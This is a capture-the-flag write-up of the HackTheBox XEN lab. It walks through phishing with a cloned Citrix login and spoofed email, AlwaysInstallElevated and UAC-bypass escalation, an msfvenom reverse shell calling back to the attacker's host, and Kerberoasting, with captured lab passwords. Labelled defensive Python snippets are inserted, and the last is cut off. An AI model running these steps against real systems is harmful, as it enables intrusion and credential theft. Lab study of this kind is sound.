xchg2pwn



Reversing and exploit development enthusiast



HackTheBox

XEN



Breach

XEN{wh0_n33d5_2f@?}


We start by scanning the machine's ports with nmap, where we find only 2 open ports, among them an HTTP service and SMTP

❯ nmap 10.13.38.12
Nmap scan report for 10.13.38.12  
PORT    STATE SERVICE
25/tcp  open  smtp
80/tcp  open  http
443/tcp open  https

Doing a curl against the HTTP service, the response headers show that it returns a 301 and redirects to the domain humongousretail.com

❯ curl 10.13.38.12 -I
HTTP/1.1 301 Moved Permanently
Content-Length: 151
Content-Type: text/html; charset=UTF-8  
Location: https://humongousretail.com/
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET

So that the domain resolves when we point at it, we add it to /etc/hosts with the victim machine's IP address

❯ echo "10.13.38.12 humongousretail.com" | sudo tee -a /etc/hosts  

If we now open the site through the domain we see a page, although there is really nothing of much interest that gives us information

Brute-forcing directories with wfuzz we find several that return 302; among them the /remote directory stands out

❯ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u http://humongousretail.com/FUZZ -t 100 --hc 404  
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://humongousretail.com/FUZZ
Total requests: 26584

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000056:   301        1 L      10 W       164 Ch      "aspnet_client"
000000015:   301        1 L      10 W       154 Ch      "css"
000000002:   301        1 L      10 W       157 Ch      "images"
000000009:   301        1 L      10 W       153 Ch      "js"
000000341:   403        29 L     92 W       1233 Ch     "web-inf"
000000986:   301        1 L      10 W       157 Ch      "remote"
000001149:   403        29 L     92 W       1233 Ch     "meta-inf"
000005777:   401        29 L     100 W      1293 Ch     "jakarta"

Opening /remote in the browser redirects us to a page that lets us install Citrix, an application for connecting to different machines

We can skip this message and install it later from the official site; clicking the skip tab redirects us to the Citrix login panel itself

Over SMTP we can enumerate users by brute-forcing with a wordlist; doing so we find 4 users, among them one called it

❯ smtp-user-enum -U /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt -D humongousretail.com -t 10.13.38.12 -m 20 -M RCPT  
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 20
Usernames file ........... /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt
Target count ............. 1
Username count ........... 21168
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ humongousretail.com

######## Scan started #########
10.13.38.12: legal@humongousretail.com exists
10.13.38.12: sales@humongousretail.com exists
10.13.38.12: it@humongousretail.com exists
10.13.38.12: marketing@humongousretail.com exists
######## Scan completed #########
4 results.

We can phish the it mailbox; for that we first download the files needed to build an identical login page

❯ tree
.
└── remote
    ├── auth
    │   ├── index.html
    │   ├── javascript.aspx
    │   ├── login.aspx
    │   ├── nocookies.aspx
    │   └── style.aspx
    ├── html
    │   ├── dummy.html
    │   └── styles
    │       └── basicStyle.css
    └── media
        ├── ButtonLeft.gif
        ├── ButtonRight.gif
        ├── CitrixLogoHeader.gif
        ├── CitrixWatermark.png
        ├── CitrixXenApp.png
        ├── Devices.gif
        ├── HDX.png
        ├── HeaderGradient.png
        ├── HorizonBgBottom.png
        ├── HorizonBgTop.png
        ├── IcaComboAll.ico
        ├── LoginPaneCenterLeftBorderGlow.gif
        ├── LoginPaneCenterRightBorderGlow.gif
        ├── LoginPaneFooterLeftBorderGlow.gif
        ├── LoginPaneFooterMidBorderGlow.gif
        ├── LoginPaneFooterRightBorderGlow.gif  
        ├── LoginPaneTopLeftBorderGlow.gif
        ├── LoginPaneTopLeftGradient.gif
        ├── LoginPaneTopMidBorderGlow.gif
        ├── LoginPaneTopRightBorderGlow.gif
        └── LoginPaneTopRightGradient.gif

6 directories, 28 files

After saving the page source into auth as index.html we can see that the data received by the login form is sent to login.aspx via POST

<form method="post" action="login.aspx" name="CitrixForm" autocomplete="off">  

We can change it so that when someone visits our login, the submitted data is sent via GET to the aspx, but to the aspx on our own IP address

<form method="get" action="http://10.10.14.10/login.aspx" name="CitrixForm" autocomplete="off">  

Now we host the site with our code using a PHP server; visiting localhost from the browser we can see that the page is identical

❯ sudo php -S 0.0.0.0:80
PHP 8.2.4 Development Server (http://0.0.0.0:80) started  

We send an email to the it team posing as the sales user, which we know exists, telling them there is a problem with the Citrix server and putting the link to our fake login in the body

❯ swaks --to sales@humongousretail.com --from it@humongousretail.com --header "Subject: Problem on the Citrix server" --body "http://10.10.14.10/remote/auth" --server humongousretail.com  
=== Trying humongousretail.com:25...
=== Connected to humongousretail.com.
<-  220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
 -> EHLO user
<-  250-CITRIX
<-  250-SIZE 20480000
<-  250-AUTH LOGIN
<-  250 HELP
 -> MAIL FROM:<it@humongousretail.com>
<-  250 OK
 -> RCPT TO:<sales@humongousretail.com>
<-  250 OK
 -> DATA
<-  354 OK, send.
 -> To: sales@humongousretail.com
 -> From: it@humongousretail.com
 -> Subject: Server Problem
 -> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
 ->
 -> http://10.10.14.10/
 -> .
<-  250 Queued (10.112 seconds)
 -> QUIT
<-  221 goodbye
=== Connection closed with remote host.

After a few seconds we receive a request to our login where someone tried to authenticate, so we can see the request with the credentials

❯ sudo php -S 0.0.0.0:80
PHP 8.2.4 Development Server (http://0.0.0.0:80) started
10.13.38.12:64162 Accepted
10.13.38.12:64162 [200]: POST /remote/auth/login.aspx?LoginType=Explicit&user=jmendes&password=VivaBARC3L0N@!!!&domain=HTB.LOCAL  
10.13.38.12:64162 Closing

After repeating the process and sending the email to it several times, we get to see the credentials of 3 different users under the domain htb.local

❯ sudo php -S 0.0.0.0:80
PHP 8.2.4 Development Server (http://0.0.0.0:80) started
10.13.38.12:64162 Accepted
10.13.38.12:64162 [200]: POST /remote/auth/login.aspx?LoginType=Explicit&user=jmendes&password=VivaBARC3L0N@!!!&domain=HTB.LOCAL  
10.13.38.12:64162 Closing
10.13.38.12:64163 Accepted
10.13.38.12:64163 [200]: POST /remote/auth/login.aspx?LoginType=Explicit&user=pmorgan&password=Summer1Summer!&domain=HTB.LOCAL
10.13.38.12:64163 Closing
10.13.38.12:64169 Accepted
10.13.38.12:64169 [200]: POST /remote/auth/login.aspx?LoginType=Explicit&user=awardel&password=@M3m3ntoM0ri@&domain=HTB.LOCAL
10.13.38.12:64169 Closing

jmendes : VivaBARC3L0N@!!!  
awardel : @M3m3ntoM0ri@
pmorgan : Summer1Summer!
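The capture above works because the cloned form submits its fields in the query string, so the credentials end up in the URL and therefore in the web server's access log in clear text. As an added example (not part of the original writeup), here is a small Python parser over the PHP dev-server lines shown above, plus one constructed benign line, that flags requests carrying password-like query parameters and redacts them before the line is stored; the `find_credential_leaks` and `redact` names and the parameter list are this example's own choices.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the three login requests printed by the PHP dev server in the
# writeup above, plus one benign request, so the script runs offline.
SAMPLE_LOG = """\
10.13.38.12:64162 [200]: POST /remote/auth/login.aspx?LoginType=Explicit&user=jmendes&password=VivaBARC3L0N@!!!&domain=HTB.LOCAL
10.13.38.12:64163 [200]: POST /remote/auth/login.aspx?LoginType=Explicit&user=pmorgan&password=Summer1Summer!&domain=HTB.LOCAL
10.13.38.12:64169 [200]: POST /remote/auth/login.aspx?LoginType=Explicit&user=awardel&password=@M3m3ntoM0ri@&domain=HTB.LOCAL
10.13.38.12:64170 [200]: GET /remote/auth/index.html
"""

# Parameter names that should never travel in a URL; extend for your own applications.
SECRET_PARAMS = {"password", "passwd", "pwd", "pass", "secret", "token", "apikey"}

# "<client>:<port> [<status>]: <METHOD> <target>" as the PHP built-in server logs it.
LINE_RE = re.compile(
    r"^(?P<client>[\d.]+):(?P<port>\d+) \[(?P<status>\d+)\]: (?P<method>[A-Z]+) (?P<target>\S+)$"
)


def parse_line(line):
    """Split one access-log line into its fields, or return None for lines we don't understand."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def find_credential_leaks(log_text):
    """One finding per request whose query string carries a secret-looking parameter."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        qs = parse_qs(url.query, keep_blank_values=True)
        leaked = sorted(k for k in qs if k.lower() in SECRET_PARAMS)
        if not leaked:
            continue
        findings.append({
            "client": rec["client"],
            "method": rec["method"],
            "path": url.path,
            "user": qs.get("user", [""])[0],
            "leaked_params": leaked,
        })
    return findings


# Matches "<secret-name>=<value>" up to the next '&' so the value can be masked in place.
SECRET_VALUE_RE = re.compile(r"(?i)\b(" + "|".join(sorted(SECRET_PARAMS)) + r")=[^&\s]*")


def redact(line):
    """Rewrite a log line so secret values are not persisted, keeping everything else intact."""
    return SECRET_VALUE_RE.sub(lambda m: m.group(1) + "=[REDACTED]", line)


if __name__ == "__main__":
    for f in find_credential_leaks(SAMPLE_LOG):
        print("%(client)s %(method)s %(path)s user=%(user)s leaked=%(leaked_params)s" % f)
    for line in SAMPLE_LOG.splitlines():
        print(redact(line))
```

The same two checks transfer to a reverse proxy or WAF log: any secret-named parameter in a query string is worth an alert, because it will be copied into every log, cache and referrer along the path, which is exactly what the cloned page exploits.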

With them we can log in to the Citrix login; the credentials that work in this case are pmorgan's under the htb.local domain

It logs us in and we have access to a machine; clicking on it downloads the launch.ica configuration file to connect to that machine with Citrix Receiver

Opening the ica file we log in to a Windows 7 x64 machine that identifies itself as vdesktop3 under the htb.local domain

Going to Desktop in the file explorer we can find the flag


Deploy

XEN{7ru573d_1n574ll3r5}


We are somewhat limited since at first we can't run a cmd; however, we can create a file with notepad whose content is cmd.exe

We save this file on the desktop with the name cmd and the bat extension, so that its content, cmd.exe, gets executed

After saving, running it from the file explorer launches a cmd as the user pmorgan; now we have a console to run commands in

To look for possible ways to escalate we upload and import the PowerUp module; running all the checks shows that it is vulnerable to AlwaysInstallElevated

PS C:\Users\pmorgan\Desktop> Import-Module .\PowerUp.ps1
PS C:\Users\pmorgan\Desktop> Invoke-AllChecks

[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
[*] Checking service executable and argument permissions...
[*] Checking service permissions...
[*] Checking %PATH% for potentially hijackable .dll locations...
[*] Checking for AlwaysInstallElevated registry key...

OutputFile    :
AbuseFunction : Write-UserAddMSI

[*] Checking for Autologon credentials in registry...
[*] Checking for vulnerable registry autoruns and configs...
[*] Checking for vulnerable schtask files/configs...
[*] Checking for unattended install files...

UnattendPath : C:\Windows\Panther\Unattend.xml

[*] Checking for encrypted web.config strings...
[*] Checking for encrypted application pool and virtual directory passwords...  

PS C:\Users\pmorgan\Desktop>
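PowerUp's AlwaysInstallElevated check boils down to two registry values, `AlwaysInstallElevated` under `HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer` and the same value under `HKCU`, and Windows Installer only honours the policy when both are set to 1. As an added example, not taken from the writeup or from PowerUp, here is a Python audit helper that parses the output of `reg query` for both hives (constructed samples are embedded) and reports whether the condition PowerUp flagged is present; the function names are this example's own.

```python
import re

# Constructed samples of what
#   reg query <hive>\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# prints; they mirror the condition PowerUp reported in the writeup above.
HKLM_ENABLED = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKCU_ENABLED = r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKCU_DISABLED = r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x0
"""
# reg.exe prints this when the policy key or value does not exist at all.
KEY_MISSING = "ERROR: The system was unable to find the specified registry key or value."

VALUE_RE = re.compile(
    r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+(0x[0-9a-fA-F]+|\d+)\s*$", re.MULTILINE
)


def parse_always_install_elevated(reg_output):
    """Return the DWORD as an int, or None when the value is absent (absent means not enabled)."""
    m = VALUE_RE.search(reg_output)
    if m is None:
        return None
    raw = m.group(1)
    return int(raw, 16) if raw.lower().startswith("0x") else int(raw)


def is_always_install_elevated(hklm_output, hkcu_output):
    """The policy only takes effect when BOTH the machine and the user value are 1."""
    return (parse_always_install_elevated(hklm_output) == 1
            and parse_always_install_elevated(hkcu_output) == 1)


def assess(hklm_output, hkcu_output):
    """Audit summary: both raw values, the verdict, and what to change when it fires."""
    vulnerable = is_always_install_elevated(hklm_output, hkcu_output)
    return {
        "hklm": parse_always_install_elevated(hklm_output),
        "hkcu": parse_always_install_elevated(hkcu_output),
        "vulnerable": vulnerable,
        "remediation": (
            "Set 'Always install with elevated privileges' to Disabled under both Computer "
            "and User Configuration > Administrative Templates > Windows Components > "
            "Windows Installer, so both values become 0"
        ) if vulnerable else None,
    }


if __name__ == "__main__":
    print(assess(HKLM_ENABLED, HKCU_ENABLED))
    print(assess(HKLM_ENABLED, HKCU_DISABLED))
    print(assess(HKLM_ENABLED, KEY_MISSING))
```

Because either hive alone is harmless, an inventory that only looks at HKLM produces false positives; checking the pair is what turns the registry read into a real finding.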

It also tells us how to exploit it; running Write-UserAddMSI creates an msi

PS C:\Users\pmorgan\Desktop> Write-UserAddMSI  

OutputPath                                   
----------                                   
UserAdd.msi                                  

PS C:\Users\pmorgan\Desktop>

After running it we find an msi file on pmorgan's desktop; executing it lets us create a user that will belong to the Administrators group

Using runas we can launch a powershell as the backdoor user we created, which should be a local administrator on vdesktop3

C:\Users\pmorgan\Desktop>runas /user:backdoor powershell.exe
Enter the password for backdoor: password123#
Attempting to start powershell -ep bypass as user "VDESKTOP3\backdoor" ...  

C:\Users\pmorgan\Desktop>

However, even though the user belongs to the local Administrators group, listing its privileges shows they are very limited, just like any other user's: UAC gives the session a filtered, medium-integrity token

PS C:\Windows\system32> net user backdoor | Select-String Group

Local Group Memberships      *Administrators       
Global Group memberships     *None                 

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========  
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

PS C:\Windows\system32>

After some searching we come across an article that explains how to bypass UAC; for this it is enough to upload the source.cs file and follow the steps it describes

PS C:\Users\backdoor\Desktop> Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\Source.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "CMSTP-UAC-Bypass.dll"  
PS C:\Users\backdoor\Desktop> [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\CMSTP-UAC-Bypass.dll"))

GAC    Version        Location                                                 
---    -------        --------                                                 
False  v2.0.50727                                                              

PS C:\Users\backdoor\Desktop> [CMSTPBypass]::Execute("C:\Windows\System32\cmd.exe")
True
PS C:\Users\backdoor\Desktop>

Doing so opens a new cmd with maximum privileges, and we can read the flag

C:\Windows\system32>type C:\Users\Administrator\Desktop\flag.txt  
XEN{7ru573d_1n574ll3r5}
C:\Windows\system32>

If we wanted to make this easier with metasploit from a meterpreter session, we first need a session; we start by creating the malicious exe with msfvenom

❯ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=443 -f exe -o shell.exe  
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe

Now, in the directory where we created the malicious exe, we start an SMB server with a share named user, enabling SMBv2 support

❯ impacket-smbserver user . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0  
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Now we configure the listener in msfconsole, setting the payload, listening on the tun0 interface and port 443, and run it so it stays listening

❯ sudo msfconsole -q
[msf](Jobs:0 Agents:0) >> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set payload windows/x64/meterpreter/reverse_tcp  
payload => windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set lhost tun0
lhost => tun0
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set lport 443
lport => 443
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> run

[*] Started reverse TCP handler on 10.10.14.10:443

From the cmd we have as pmorgan we run the malicious shell.exe from the user SMB share we created

C:\Users\pmorgan\Desktop>\\10.10.14.10\user\shell.exe  

C:\Users\pmorgan\Desktop>

Running the exe we receive a connection from the machine on our metasploit listener and get a meterpreter session as the user pmorgan

[msf](Jobs:0 Agents:0) exploit(multi/handler) >> run

[*] Started reverse TCP handler on 10.10.14.10:443
[*] Sending stage (200774 bytes) to 10.13.38.15
[*] Meterpreter session 1 opened (10.10.14.10:443 -> 10.13.38.15:54595)  

(Meterpreter 1)(C:\Users\pmorgan\Desktop) > getuid
Server username: HTB\pmorgan
(Meterpreter 1)(C:\Users\pmorgan\Desktop) >

We can background the session and use a recon module to test for possible exploits the machine might be vulnerable to

(Meterpreter 1)(C:\Users\pmorgan\Desktop) > background
[*] Backgrounding session 1...
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> use post/multi/recon/local_exploit_suggester
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> set session 1
session => 1
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> run

[*] 10.13.38.15 - Collecting local exploits for x64/windows...
[*] 10.13.38.15 - 183 exploit checks are being tried...
[+] 10.13.38.15 - exploit/windows/local/always_install_elevated: The target is vulnerable.
[+] 10.13.38.15 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.13.38.15 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.13.38.15 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.13.38.15 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 10.13.38.15 - exploit/windows/local/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable.
[+] 10.13.38.15 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.  
[+] 10.13.38.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.13.38.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.13.38.15 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.13.38.15 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 43 / 43
[*] Post module execution completed
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >>

It reports that it is vulnerable to always_install_elevated; it is enough to run the exploit, setting the session and host, to get a shell as Administrator

[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> use exploit/windows/local/always_install_elevated  
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:1) exploit(windows/local/always_install_elevated) >> set session 1
session => 1
[msf](Jobs:0 Agents:1) exploit(windows/local/always_install_elevated) >> set lhost tun0
lhost => tun0
[msf](Jobs:0 Agents:1) exploit(windows/local/always_install_elevated) >> run
[*] Started reverse TCP handler on 10.10.14.10:4444
[*] Uploading the MSI to C:\Users\pmorgan\AppData\Local\Temp\fbwGXm.msi ...
[*] Executing MSI...
[*] Sending stage (175686 bytes) to 10.13.38.15
[+] Deleted C:\Users\pmorgan\AppData\Local\Temp\fbwGXm.msi
[*] Meterpreter session 2 opened (10.10.14.10:4444 -> 10.13.38.15:54617)

(Meterpreter 2)(C:\Windows\system32) > getuid
Server username: NT AUTHORITY\SYSTEM
(Meterpreter 2)(C:\Windows\system32) >

With shell we get an interactive cmd where, entering the Administrator user's desktop, we can see the flag, so we simply read it

(Meterpreter 2)(C:\Windows\system32) > shell
Process 2000 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.  

C:\Windows\system32>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir

 Volume in drive C has no label.
 Volume Serial Number is D851-8BE0

 Directory of C:\Users\Administrator\Desktop

03/31/2019  02:46 AM    <DIR>          .
03/31/2019  02:46 AM    <DIR>          ..
03/31/2019  10:51 PM                23 flag.txt
               1 File(s)             23 bytes
               2 Dir(s)   4,173,213,696 bytes free

C:\Users\Administrator\Desktop>type flag.txt
XEN{7ru573d_1n574ll3r5}

C:\Users\Administrator\Desktop>


Ghost

XEN{l364cy_5pn5_ftw}


First, let's get an idea of the network; a simple ping to the computername DC shows its IPv4 address in 172.16.249.*

C:\Windows\system32>ping -n 1 dc

Pinging DC.htb.local [172.16.249.200] with 32 bytes of data:  
Reply from 172.16.249.200: bytes=32 time<1ms TTL=128

Ping statistics for 172.16.249.200:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:\Windows\system32>

We can do the same with the other hostnames to see their IPv4, such as citrix

C:\Windows\system32>ping -n 1 citrix

Pinging citrix.htb.local [172.16.249.201] with 32 bytes of data:  
Reply from 172.16.249.201: bytes=32 time<1ms TTL=128

Ping statistics for 172.16.249.201:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:\Windows\system32>

After enumerating all the hosts one is left, NetScaler, which by elimination must be .202; it answers with a TTL of 64, so it may be Linux

C:\Windows\system32>ping -n 1 172.16.249.202

Pinging 172.16.249.202 with 32 bytes of data:
Reply from 172.16.249.202: bytes=32 time=101ms TTL=64

Ping statistics for 172.16.249.202:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),  
Approximate round trip times in milli-seconds:
    Minimum = 101ms, Maximum = 101ms, Average = 101ms

C:\Windows\system32>

Taking the hostnames and addresses into account, we end up with a map like this

[+] Active hosts on 172.16.249.200/24:  

    [*] 172.16.249.200: dc
    [*] 172.16.249.201: citrix
    [*] 172.16.249.202: netscaler
    [*] 172.16.249.203: vdesktop1
    [*] 172.16.249.204: vdesktop2
    [*] 172.16.249.205: vdesktop3

To have connectivity from our machine we can use ligolo-ng, using the agent to connect back to our machine on port 11601, the port the proxy listens on

C:\Users\Administrator\Desktop> .\agent.exe -connect 10.10.14.10:11601 -ignore-cert  

In the proxy we get a session; we select it and start the tunnel with start

❯ ./proxy -selfcert
WARN[0000] Using automatically generated self-signed certificates (Not recommended)
INFO[0000] Listening on 0.0.0.0:11601
    __    _             __
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/

Made in France ♥ by @Nicocha30!

ligolo-ng »
INFO[0034] Agent joined.           name="VDESKTOP3\\backdoor@VDESKTOP3" remote="10.13.38.15:54553"  
ligolo-ng » session
? Specify a session : 1 - VDESKTOP3\backdoor@VDESKTOP3 - 10.13.38.15:54553
[Agent : VDESKTOP3\backdoor@VDESKTOP3] » start
INFO[0044] Starting tunnel to VDESKTOP3\backdoor@VDESKTOP3
[Agent : VDESKTOP3\backdoor@VDESKTOP3] »

We add the 172.16.249.0/24 segment to the ligolo interface and now we have connectivity to all the machines in the domain; we can check it with a ping

❯ sudo ip route add 172.16.249.0/24 dev ligolo

❯ ping -c1 -w1 172.16.249.200
PING 172.16.249.200 (172.16.249.200) 56(84) bytes of data.
64 bytes from 172.16.249.200: icmp_seq=1 ttl=64 time=272 ms  

--- 172.16.249.200 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 272.401/272.401/272.401/0.000 ms

After configuring ligolo we have connectivity to the internal interface; we start by using crackmapexec to see the machines belonging to the domain over SMB

❯ crackmapexec smb 172.16.249.200-205
SMB         172.16.249.201  445    CITRIX           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:CITRIX) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         172.16.249.205  445    VDESKTOP3        [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:VDESKTOP3) (domain:htb.local) (signing:False) (SMBv1:True)
SMB         172.16.249.200  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:htb.local) (signing:True) (SMBv1:False)

Using the SharpHound.ps1 module we enumerate all the domain information; this creates a zip containing the json files with that information

PS C:\ProgramData> Import-Module \\10.10.14.14\user\SharpHound.ps1
PS C:\ProgramData> Invoke-BloodHound -CollectionMethod All
PS C:\ProgramData> dir

   Directory: C:\ProgramData

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         2/11/2019   5:30 PM            Citrix
d---s         2/24/2019   6:17 PM            Microsoft
d----         2/10/2019   7:03 PM            Package Cache
d----         2/10/2019   7:04 PM            VMware
-a---         4/25/2023   1:42 PM      15979 20230425184206_BloodHound.zip  
-a---         4/25/2023   1:29 PM    1318097 SharpHound.ps1

PS C:\ProgramData>

Moving on to the data collected earlier, in BloodHound, listing all the kerberoastable users of the domain we find the user mturner vulnerable

It is true that we need credentials to do the kerberoasting; however, trying the ones we found at the start, pmorgan's are valid in the domain

❯ crackmapexec smb 172.16.249.200 -u pmorgan -p Summer1Summer!
SMB         172.16.249.200  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         172.16.249.200  445    DC               [+] htb.local\pmorgan:Summer1Summer!

We can use them with impacket's GetUserSPNs to request a TGS for the kerberoastable users; doing so we receive a hash for the user mturner

❯ impacket-GetUserSPNs htb.local/pmorgan:Summer1Summer! -dc-ip 172.16.249.200 -request 
Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName                Name     MemberOf                                 PasswordLastSet             LastLogon                   Delegation 
----------------------------------  -------  ---------------------------------------  --------------------------  --------------------------  ----------
MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433  mturner  CN=Deployment,OU=Groups,DC=htb,DC=local  2019-02-13 17:23:48.796612  2023-04-17 05:16:45.659598             

$krb5tgs$23$*mturner$HTB.LOCAL$htb.local/mturner*$527ee48ade01c5b1769e29d9539fbbfd$...

Running john at first we fail to crack the hash with rockyou.txt, but applying some rules we obtain the password 4install!

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash --rules:d3ad0ne  
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Press 'q' or Ctrl-C to abort, almost any other key for status
4install!        (?)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
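The john banner above spells out why this works: etype 23 is RC4-HMAC, keyed directly from the account's NT hash, so a service ticket for that account can be cracked offline with a wordlist. From the defender's side the same request shows up in the domain controller's Security log as event 4769 ("A Kerberos service ticket was requested") with Ticket Encryption Type 0x17. As an added example that is not from the writeup, the Python below parses the header of a krb5tgs line like the one obtained above and runs a simple Kerberoast heuristic over constructed 4769 records: one requester pulling RC4 tickets for several distinct non-machine service accounts within a short window. The field names follow the real event; the event values, thresholds and function names are this example's own assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # Kerberos etype 23, the "$krb5tgs$23$" that john loaded above
ETYPE_NAMES = {
    0x01: "DES-CBC-CRC", 0x03: "DES-CBC-MD5",
    0x11: "AES128-CTS-HMAC-SHA1-96", 0x12: "AES256-CTS-HMAC-SHA1-96",
    0x17: "RC4-HMAC", 0x18: "RC4-HMAC-EXP",
}

# Header of the ticket hash from the writeup; the encrypted part is omitted here.
SAMPLE_HASH = ("$krb5tgs$23$*mturner$HTB.LOCAL$htb.local/mturner*"
               "$527ee48ade01c5b1769e29d9539fbbfd$<edata omitted>")

# $krb5tgs$<etype>$*<account>$<realm>$<spn>*$<checksum>$<encrypted ticket>
HASH_HEADER_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*\$"
)

# Constructed 4769 events: field names as in the Security log, values invented for
# this example. pmorgan requests three RC4 tickets in two seconds; jmendes requests one.
EVENTS = [
    {"time": "2023-04-25T18:40:01", "TargetUserName": "pmorgan@HTB.LOCAL", "ServiceName": "mturner", "TicketEncryptionType": "0x17", "IpAddress": "172.16.249.205"},
    {"time": "2023-04-25T18:40:01", "TargetUserName": "pmorgan@HTB.LOCAL", "ServiceName": "sqlsvc", "TicketEncryptionType": "0x17", "IpAddress": "172.16.249.205"},
    {"time": "2023-04-25T18:40:02", "TargetUserName": "pmorgan@HTB.LOCAL", "ServiceName": "websvc", "TicketEncryptionType": "0x17", "IpAddress": "172.16.249.205"},
    {"time": "2023-04-25T18:40:02", "TargetUserName": "pmorgan@HTB.LOCAL", "ServiceName": "CITRIX$", "TicketEncryptionType": "0x12", "IpAddress": "172.16.249.205"},
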